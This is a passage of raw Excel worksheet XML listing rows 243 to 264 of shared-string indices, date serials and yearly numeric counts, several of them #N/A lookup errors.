        <v>25480</v>
      </c>
      <c r="W243" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="244" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A244" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B244" s="51">
        <v>44344.76032202546</v>
      </c>
      <c r="C244" s="1" t="s">
        <v>2659</v>
      </c>
      <c r="D244" s="43">
        <v>101</v>
      </c>
      <c r="E244" s="1" t="s">
        <v>2660</v>
      </c>
      <c r="F244" s="26">
        <v>101</v>
      </c>
      <c r="G244" s="1" t="s">
        <v>2661</v>
      </c>
      <c r="H244" s="1" t="s">
        <v>2662</v>
      </c>
      <c r="I244" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J244" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K244" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L244" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M244" s="1" t="s">
        <v>158</v>
      </c>
      <c r="N244" s="1" t="s">
        <v>159</v>
      </c>
      <c r="O244" s="1"/>
      <c r="P244" s="1"/>
      <c r="Q244" s="1" t="s">
        <v>3584</v>
      </c>
      <c r="R244" s="83">
        <v>32658</v>
      </c>
      <c r="S244" s="83">
        <v>31144</v>
      </c>
      <c r="T244" s="83">
        <v>28657</v>
      </c>
      <c r="U244" s="83">
        <v>30336</v>
      </c>
      <c r="V244" s="83">
        <v>32350</v>
      </c>
      <c r="W244" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="245" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A245" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B245" s="51">
        <v>44425.807912835648</v>
      </c>
      <c r="C245" s="1" t="s">
        <v>2667</v>
      </c>
      <c r="D245" s="43">
        <v>130</v>
      </c>
      <c r="E245" s="1" t="s">
        <v>2668</v>
      </c>
      <c r="F245" s="26">
        <v>130</v>
      </c>
      <c r="G245" s="1" t="s">
        <v>2669</v>
      </c>
      <c r="H245" s="1" t="s">
        <v>2670</v>
      </c>
      <c r="I245" s="1" t="s">
        <v>833</v>
      </c>
      <c r="J245" s="1" t="s">
        <v>25</v>
      </c>
      <c r="K245" s="1" t="s">
        <v>25</v>
      </c>
      <c r="L245" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M245" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N245" s="1"/>
      <c r="O245" s="1" t="s">
        <v>111</v>
      </c>
      <c r="P245" s="1"/>
      <c r="Q245" s="1" t="s">
        <v>3585</v>
      </c>
      <c r="R245" s="83">
        <v>14994</v>
      </c>
      <c r="S245" s="83">
        <v>12006</v>
      </c>
      <c r="T245" s="83">
        <v>10892</v>
      </c>
      <c r="U245" s="83">
        <v>12934</v>
      </c>
      <c r="V245" s="83">
        <v>14285</v>
      </c>
      <c r="W245" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="246" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A246" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B246" s="51">
        <v>44705.760514351852</v>
      </c>
      <c r="C246" s="1" t="s">
        <v>2667</v>
      </c>
      <c r="D246" s="26">
        <v>130</v>
      </c>
      <c r="E246" s="1" t="s">
        <v>2672</v>
      </c>
      <c r="F246" s="26">
        <v>100</v>
      </c>
      <c r="G246" s="57" t="s">
        <v>2673</v>
      </c>
      <c r="H246" s="1" t="s">
        <v>2674</v>
      </c>
      <c r="I246" s="1" t="s">
        <v>833</v>
      </c>
      <c r="J246" s="1" t="s">
        <v>25</v>
      </c>
      <c r="K246" s="1" t="s">
        <v>25</v>
      </c>
      <c r="L246" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M246" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N246" s="1"/>
      <c r="O246" s="1"/>
      <c r="P246" s="1"/>
      <c r="Q246" s="1" t="s">
        <v>3585</v>
      </c>
      <c r="R246" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S246" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T246" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U246" s="83">
        <v>16</v>
      </c>
      <c r="V246" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W246" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="247" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A247" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B247" s="51">
        <v>44705.760514363428</v>
      </c>
      <c r="C247" s="1" t="s">
        <v>2667</v>
      </c>
      <c r="D247" s="26">
        <v>130</v>
      </c>
      <c r="E247" s="1" t="s">
        <v>2675</v>
      </c>
      <c r="F247" s="26">
        <v>100</v>
      </c>
      <c r="G247" s="57" t="s">
        <v>2676</v>
      </c>
      <c r="H247" s="1" t="s">
        <v>2677</v>
      </c>
      <c r="I247" s="1" t="s">
        <v>833</v>
      </c>
      <c r="J247" s="1" t="s">
        <v>25</v>
      </c>
      <c r="K247" s="1" t="s">
        <v>25</v>
      </c>
      <c r="L247" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M247" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N247" s="1"/>
      <c r="O247" s="1"/>
      <c r="P247" s="1"/>
      <c r="Q247" s="1" t="s">
        <v>3585</v>
      </c>
      <c r="R247" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S247" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T247" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U247" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V247" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W247" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="248" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A248" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B248" s="51">
        <v>44705.760514374997</v>
      </c>
      <c r="C248" s="1" t="s">
        <v>2667</v>
      </c>
      <c r="D248" s="26">
        <v>130</v>
      </c>
      <c r="E248" s="1" t="s">
        <v>2678</v>
      </c>
      <c r="F248" s="26">
        <v>100</v>
      </c>
      <c r="G248" s="57" t="s">
        <v>2679</v>
      </c>
      <c r="H248" s="1" t="s">
        <v>2680</v>
      </c>
      <c r="I248" s="1" t="s">
        <v>833</v>
      </c>
      <c r="J248" s="1" t="s">
        <v>25</v>
      </c>
      <c r="K248" s="1" t="s">
        <v>25</v>
      </c>
      <c r="L248" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M248" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N248" s="1"/>
      <c r="O248" s="1"/>
      <c r="P248" s="1"/>
      <c r="Q248" s="1" t="s">
        <v>3585</v>
      </c>
      <c r="R248" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S248" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T248" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U248" s="83">
        <v>22</v>
      </c>
      <c r="V248" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W248" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="249" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A249" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B249" s="51">
        <v>44244.45290877315</v>
      </c>
      <c r="C249" s="1" t="s">
        <v>2681</v>
      </c>
      <c r="D249" s="43">
        <v>100</v>
      </c>
      <c r="E249" s="1" t="s">
        <v>2682</v>
      </c>
      <c r="F249" s="26">
        <v>100</v>
      </c>
      <c r="G249" s="1" t="s">
        <v>2683</v>
      </c>
      <c r="H249" s="1" t="s">
        <v>2684</v>
      </c>
      <c r="I249" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J249" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K249" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L249" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M249" s="1" t="s">
        <v>158</v>
      </c>
      <c r="N249" s="1" t="s">
        <v>159</v>
      </c>
      <c r="O249" s="1"/>
      <c r="P249" s="1"/>
      <c r="Q249" s="1" t="s">
        <v>3584</v>
      </c>
      <c r="R249" s="83">
        <v>828</v>
      </c>
      <c r="S249" s="83">
        <v>965</v>
      </c>
      <c r="T249" s="83">
        <v>956</v>
      </c>
      <c r="U249" s="83">
        <v>994</v>
      </c>
      <c r="V249" s="83">
        <v>1178</v>
      </c>
      <c r="W249" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="250" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A250" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B250" s="51">
        <v>44425.867255358797</v>
      </c>
      <c r="C250" s="1" t="s">
        <v>2685</v>
      </c>
      <c r="D250" s="43">
        <v>120</v>
      </c>
      <c r="E250" s="1" t="s">
        <v>2686</v>
      </c>
      <c r="F250" s="26">
        <v>101</v>
      </c>
      <c r="G250" s="1" t="s">
        <v>2687</v>
      </c>
      <c r="H250" s="1" t="s">
        <v>2688</v>
      </c>
      <c r="I250" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J250" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K250" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L250" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M250" s="1" t="s">
        <v>158</v>
      </c>
      <c r="N250" s="1" t="s">
        <v>159</v>
      </c>
      <c r="O250" s="1" t="s">
        <v>2689</v>
      </c>
      <c r="P250" s="1"/>
      <c r="Q250" s="1" t="s">
        <v>3586</v>
      </c>
      <c r="R250" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S250" s="83">
        <v>6</v>
      </c>
      <c r="T250" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U250" s="83">
        <v>11</v>
      </c>
      <c r="V250" s="83">
        <v>7</v>
      </c>
      <c r="W250" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="251" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A251" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B251" s="51">
        <v>44522.770695590276</v>
      </c>
      <c r="C251" s="1" t="s">
        <v>2685</v>
      </c>
      <c r="D251" s="43">
        <v>120</v>
      </c>
      <c r="E251" s="1" t="s">
        <v>2691</v>
      </c>
      <c r="F251" s="26">
        <v>101</v>
      </c>
      <c r="G251" s="1" t="s">
        <v>2692</v>
      </c>
      <c r="H251" s="1" t="s">
        <v>2693</v>
      </c>
      <c r="I251" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J251" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K251" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L251" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M251" s="1" t="s">
        <v>158</v>
      </c>
      <c r="N251" s="1" t="s">
        <v>159</v>
      </c>
      <c r="O251" s="1" t="s">
        <v>2694</v>
      </c>
      <c r="P251" s="1"/>
      <c r="Q251" s="1" t="s">
        <v>3586</v>
      </c>
      <c r="R251" s="83">
        <v>14</v>
      </c>
      <c r="S251" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T251" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U251" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V251" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W251" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="252" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A252" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B252" s="51">
        <v>44749.768248969907</v>
      </c>
      <c r="C252" s="1" t="s">
        <v>2685</v>
      </c>
      <c r="D252" s="26">
        <v>120</v>
      </c>
      <c r="E252" s="1" t="s">
        <v>2695</v>
      </c>
      <c r="F252" s="26">
        <v>100</v>
      </c>
      <c r="G252" s="57" t="s">
        <v>2696</v>
      </c>
      <c r="H252" s="1" t="s">
        <v>2697</v>
      </c>
      <c r="I252" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J252" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K252" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L252" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M252" s="1" t="s">
        <v>158</v>
      </c>
      <c r="N252" s="1" t="s">
        <v>159</v>
      </c>
      <c r="O252" s="1" t="s">
        <v>2698</v>
      </c>
      <c r="P252" s="1"/>
      <c r="Q252" s="1" t="s">
        <v>3586</v>
      </c>
      <c r="R252" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S252" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T252" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U252" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V252" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W252" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="253" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A253" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B253" s="51">
        <v>44104.757099861112</v>
      </c>
      <c r="C253" s="1" t="s">
        <v>2699</v>
      </c>
      <c r="D253" s="43">
        <v>100</v>
      </c>
      <c r="E253" s="1" t="s">
        <v>2700</v>
      </c>
      <c r="F253" s="26">
        <v>200</v>
      </c>
      <c r="G253" s="1" t="s">
        <v>2701</v>
      </c>
      <c r="H253" s="1" t="s">
        <v>2702</v>
      </c>
      <c r="I253" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J253" s="1" t="s">
        <v>226</v>
      </c>
      <c r="K253" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L253" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M253" s="1" t="s">
        <v>2703</v>
      </c>
      <c r="N253" s="1"/>
      <c r="O253" s="1"/>
      <c r="P253" s="1"/>
      <c r="Q253" s="1" t="s">
        <v>1406</v>
      </c>
      <c r="R253" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S253" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T253" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U253" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V253" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W253" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="254" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A254" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B254" s="51">
        <v>44594.937432523147</v>
      </c>
      <c r="C254" s="1" t="s">
        <v>2704</v>
      </c>
      <c r="D254" s="43">
        <v>230</v>
      </c>
      <c r="E254" s="1" t="s">
        <v>2705</v>
      </c>
      <c r="F254" s="43">
        <v>211</v>
      </c>
      <c r="G254" s="1" t="s">
        <v>2706</v>
      </c>
      <c r="H254" s="1" t="s">
        <v>2707</v>
      </c>
      <c r="I254" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J254" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K254" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L254" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M254" s="1" t="s">
        <v>158</v>
      </c>
      <c r="N254" s="1" t="s">
        <v>159</v>
      </c>
      <c r="O254" s="1" t="s">
        <v>111</v>
      </c>
      <c r="P254" s="1"/>
      <c r="Q254" s="48" t="s">
        <v>3587</v>
      </c>
      <c r="R254" s="83">
        <v>2397083</v>
      </c>
      <c r="S254" s="83">
        <v>2134619</v>
      </c>
      <c r="T254" s="83">
        <v>2295891</v>
      </c>
      <c r="U254" s="83">
        <v>2492574</v>
      </c>
      <c r="V254" s="83">
        <v>3209852</v>
      </c>
      <c r="W254" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="255" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A255" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B255" s="51">
        <v>44594.9374325463</v>
      </c>
      <c r="C255" s="1" t="s">
        <v>2704</v>
      </c>
      <c r="D255" s="43">
        <v>230</v>
      </c>
      <c r="E255" s="1" t="s">
        <v>2709</v>
      </c>
      <c r="F255" s="26">
        <v>113</v>
      </c>
      <c r="G255" s="1" t="s">
        <v>2710</v>
      </c>
      <c r="H255" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I255" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J255" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K255" s="3" t="s">
        <v>21</v>
      </c>
      <c r="L255" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M255" s="1" t="s">
        <v>158</v>
      </c>
      <c r="N255" s="1" t="s">
        <v>159</v>
      </c>
      <c r="O255" s="1"/>
      <c r="P255" s="1"/>
      <c r="Q255" s="48" t="s">
        <v>3587</v>
      </c>
      <c r="R255" s="83">
        <v>1463983</v>
      </c>
      <c r="S255" s="83">
        <v>1734292</v>
      </c>
      <c r="T255" s="83">
        <v>1909018</v>
      </c>
      <c r="U255" s="83">
        <v>2036438</v>
      </c>
      <c r="V255" s="83">
        <v>2549187</v>
      </c>
      <c r="W255" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="256" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A256" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B256" s="51">
        <v>44594.937432476851</v>
      </c>
      <c r="C256" s="1" t="s">
        <v>2704</v>
      </c>
      <c r="D256" s="43">
        <v>230</v>
      </c>
      <c r="E256" s="1" t="s">
        <v>2711</v>
      </c>
      <c r="F256" s="43">
        <v>208</v>
      </c>
      <c r="G256" s="1" t="s">
        <v>2712</v>
      </c>
      <c r="H256" s="1" t="s">
        <v>2713</v>
      </c>
      <c r="I256" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J256" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K256" s="3" t="s">
        <v>21</v>
      </c>
      <c r="L256" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M256" s="1" t="s">
        <v>158</v>
      </c>
      <c r="N256" s="1" t="s">
        <v>159</v>
      </c>
      <c r="O256" s="1" t="s">
        <v>111</v>
      </c>
      <c r="P256" s="1"/>
      <c r="Q256" s="48" t="s">
        <v>3587</v>
      </c>
      <c r="R256" s="86">
        <v>10150</v>
      </c>
      <c r="S256" s="83">
        <v>9127</v>
      </c>
      <c r="T256" s="83">
        <v>7619</v>
      </c>
      <c r="U256" s="86">
        <v>16554</v>
      </c>
      <c r="V256" s="86">
        <v>24847</v>
      </c>
      <c r="W256" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="257" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A257" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B257" s="51">
        <v>44594.937432569444</v>
      </c>
      <c r="C257" s="1" t="s">
        <v>2704</v>
      </c>
      <c r="D257" s="43">
        <v>230</v>
      </c>
      <c r="E257" s="1" t="s">
        <v>2714</v>
      </c>
      <c r="F257" s="43">
        <v>100</v>
      </c>
      <c r="G257" s="1" t="s">
        <v>2715</v>
      </c>
      <c r="H257" s="1" t="s">
        <v>2716</v>
      </c>
      <c r="I257" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J257" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K257" s="3" t="s">
        <v>21</v>
      </c>
      <c r="L257" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M257" s="1" t="s">
        <v>158</v>
      </c>
      <c r="N257" s="1" t="s">
        <v>159</v>
      </c>
      <c r="O257" s="1"/>
      <c r="P257" s="1"/>
      <c r="Q257" s="48" t="s">
        <v>3587</v>
      </c>
      <c r="R257" s="86" t="e">
        <v>#N/A</v>
      </c>
      <c r="S257" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T257" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U257" s="86">
        <v>167</v>
      </c>
      <c r="V257" s="86">
        <v>24904</v>
      </c>
      <c r="W257" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="258" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A258" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B258" s="51">
        <v>44603.7096833912</v>
      </c>
      <c r="C258" s="1" t="s">
        <v>2717</v>
      </c>
      <c r="D258" s="26">
        <v>201</v>
      </c>
      <c r="E258" s="1" t="s">
        <v>2718</v>
      </c>
      <c r="F258" s="26">
        <v>201</v>
      </c>
      <c r="G258" s="1" t="s">
        <v>2719</v>
      </c>
      <c r="H258" s="1" t="s">
        <v>2720</v>
      </c>
      <c r="I258" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J258" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K258" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L258" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M258" s="1" t="s">
        <v>2703</v>
      </c>
      <c r="N258" s="1"/>
      <c r="O258" s="1"/>
      <c r="P258" s="1"/>
      <c r="Q258" s="1" t="s">
        <v>1325</v>
      </c>
      <c r="R258" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S258" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T258" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U258" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V258" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W258" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="259" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A259" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B259" s="51">
        <v>44603.709683414352</v>
      </c>
      <c r="C259" s="1" t="s">
        <v>2717</v>
      </c>
      <c r="D259" s="26">
        <v>201</v>
      </c>
      <c r="E259" s="1" t="s">
        <v>2721</v>
      </c>
      <c r="F259" s="26">
        <v>201</v>
      </c>
      <c r="G259" s="1" t="s">
        <v>2722</v>
      </c>
      <c r="H259" s="1" t="s">
        <v>2723</v>
      </c>
      <c r="I259" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J259" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K259" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L259" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M259" s="1" t="s">
        <v>2703</v>
      </c>
      <c r="N259" s="1"/>
      <c r="O259" s="1"/>
      <c r="P259" s="1"/>
      <c r="Q259" s="1" t="s">
        <v>1325</v>
      </c>
      <c r="R259" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S259" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T259" s="83">
        <v>722</v>
      </c>
      <c r="U259" s="83">
        <v>303</v>
      </c>
      <c r="V259" s="83">
        <v>317</v>
      </c>
      <c r="W259" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="260" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A260" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B260" s="51">
        <v>44252.689908368055</v>
      </c>
      <c r="C260" s="1" t="s">
        <v>2724</v>
      </c>
      <c r="D260" s="43">
        <v>100</v>
      </c>
      <c r="E260" s="1" t="s">
        <v>2725</v>
      </c>
      <c r="F260" s="26">
        <v>100</v>
      </c>
      <c r="G260" s="1" t="s">
        <v>2726</v>
      </c>
      <c r="H260" s="1" t="s">
        <v>2727</v>
      </c>
      <c r="I260" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J260" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K260" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L260" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M260" s="1" t="s">
        <v>158</v>
      </c>
      <c r="N260" s="1" t="s">
        <v>159</v>
      </c>
      <c r="O260" s="1"/>
      <c r="P260" s="1"/>
      <c r="Q260" s="1" t="s">
        <v>3588</v>
      </c>
      <c r="R260" s="83">
        <v>19235</v>
      </c>
      <c r="S260" s="83">
        <v>18368</v>
      </c>
      <c r="T260" s="83">
        <v>16361</v>
      </c>
      <c r="U260" s="83">
        <v>17012</v>
      </c>
      <c r="V260" s="83">
        <v>18560</v>
      </c>
      <c r="W260" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="261" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A261" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B261" s="51">
        <v>44383.478941574074</v>
      </c>
      <c r="C261" s="1" t="s">
        <v>2729</v>
      </c>
      <c r="D261" s="43">
        <v>100</v>
      </c>
      <c r="E261" s="1" t="s">
        <v>2730</v>
      </c>
      <c r="F261" s="26">
        <v>100</v>
      </c>
      <c r="G261" s="1" t="s">
        <v>2731</v>
      </c>
      <c r="H261" s="1" t="s">
        <v>2732</v>
      </c>
      <c r="I261" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J261" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K261" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L261" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M261" s="1" t="s">
        <v>158</v>
      </c>
      <c r="N261" s="1" t="s">
        <v>159</v>
      </c>
      <c r="O261" s="1"/>
      <c r="P261" s="1"/>
      <c r="Q261" s="1" t="s">
        <v>3589</v>
      </c>
      <c r="R261" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S261" s="83">
        <v>7573</v>
      </c>
      <c r="T261" s="83">
        <v>1404</v>
      </c>
      <c r="U261" s="83">
        <v>4531</v>
      </c>
      <c r="V261" s="83">
        <v>19991</v>
      </c>
      <c r="W261" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="262" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A262" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B262" s="51">
        <v>44375.762945532406</v>
      </c>
      <c r="C262" s="1" t="s">
        <v>2734</v>
      </c>
      <c r="D262" s="43">
        <v>101</v>
      </c>
      <c r="E262" s="1" t="s">
        <v>2735</v>
      </c>
      <c r="F262" s="26">
        <v>101</v>
      </c>
      <c r="G262" s="1" t="s">
        <v>2736</v>
      </c>
      <c r="H262" s="1" t="s">
        <v>2737</v>
      </c>
      <c r="I262" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J262" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K262" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L262" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M262" s="1" t="s">
        <v>158</v>
      </c>
      <c r="N262" s="1" t="s">
        <v>159</v>
      </c>
      <c r="O262" s="1" t="s">
        <v>2738</v>
      </c>
      <c r="P262" s="1"/>
      <c r="Q262" s="1" t="s">
        <v>3590</v>
      </c>
      <c r="R262" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S262" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T262" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U262" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V262" s="83">
        <v>22</v>
      </c>
      <c r="W262" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="263" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A263" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B263" s="51">
        <v>44375.762945567127</v>
      </c>
      <c r="C263" s="1" t="s">
        <v>2734</v>
      </c>
      <c r="D263" s="43">
        <v>101</v>
      </c>
      <c r="E263" s="1" t="s">
        <v>2740</v>
      </c>
      <c r="F263" s="26">
        <v>110</v>
      </c>
      <c r="G263" s="1" t="s">
        <v>2741</v>
      </c>
      <c r="H263" s="1" t="s">
        <v>2742</v>
      </c>
      <c r="I263" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J263" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K263" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L263" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M263" s="1" t="s">
        <v>158</v>
      </c>
      <c r="N263" s="1" t="s">
        <v>159</v>
      </c>
      <c r="O263" s="1" t="s">
        <v>2743</v>
      </c>
      <c r="P263" s="1"/>
      <c r="Q263" s="1" t="s">
        <v>3590</v>
      </c>
      <c r="R263" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S263" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T263" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U263" s="83">
        <v>5</v>
      </c>
      <c r="V263" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W263" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="264" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A264" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B264" s="51">
        <v>44312.610072280091</v>
      </c>
      <c r="C264" s="1" t="s">
        <v>2785</v>
      </c>
      <c r="D264" s="43">
        <v>110</v>
      </c>
      <c r="E264" s="1" t="s">
        <v>2786</v>
      </c>
      <c r="F264" s="26">
        <v>210</v>
      </c>
      <c r="G264" s="1" t="s">
        <v>2782</v>
      </c>
      <c r="H264" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I264" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J264" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K264" s="1" t="s">
        <v>17</v>
      </c>
      <c r="L264" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M264" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N264" s="1"/>
      <c r="O264" s="1"/>
      <c r="P264" s="1"/>
      <c r="Q264" s="1" t="s">
        <v>3591</v>
      </c>
      <c r="R264" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S264" s="83">
        <v>1</v>
      </c>
      <c r="T264" s="83">
        <v>1</v>
      </c>
      <c r="U264" s="83">
        <v>3</v>
